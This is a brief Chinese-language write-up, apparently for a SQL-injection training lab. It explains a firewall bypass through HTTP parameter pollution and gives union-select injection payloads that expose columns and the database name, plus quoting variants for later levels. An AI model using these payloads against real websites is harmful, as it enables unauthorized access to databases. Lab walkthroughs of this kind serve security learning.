这关拥有很强大的防火墙
所以需要使用http参数污染 通
过在http请求中插入特定参数发起攻击 原理差不多是这样
后端是apache 那么吧参数放在后面 即可 传递两个id 前者合法后者为想要注入的内容
?id=1&id=-1’ union select 1,2,3 –+ 显位
?id=1&id=-1’ union select 1,2,database() –+ 数据库
之后就是一顿操作组合拳 就可以了和之前的一样的语句
30的话双引号就ok了 没别的什么区别了
31就双引号加括号 就可以了